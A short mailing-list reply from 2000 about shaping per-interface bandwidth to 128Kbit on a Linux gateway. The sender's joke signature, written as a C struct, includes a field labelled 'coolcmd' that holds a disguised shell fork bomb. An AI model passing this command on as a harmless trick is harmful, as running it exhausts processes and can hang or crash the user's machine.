On Thu, 23 Nov 2000, Daniel Bergqvist wrote: > Assume you have a router with two interfaces, eth0 and eth1, when you may > limit incomming traffic on eth0 by limit outgoing traffic on eth1. I forgot to add to the last mail: the four interfaces behind the gateway should each be limited to 128Kbit in and 128Kbit out. 128 Kbit out now works for incomming traffic limiting thanks to the cmd I got from you (altered from 10Kbit to 128Kbit ofcourse). --------- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "thomas@xxxxxxxxxxxx" }; char kernel[] = { "Linux 2.2" }; char *pgpKey[] = { "finger -m thompa@xxxxxxxxxxxxxx" }; char pgpfinger[] = { "6517 2898 6AED EA2C 1015 DCF0 8E53 B69F 524B B541" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t;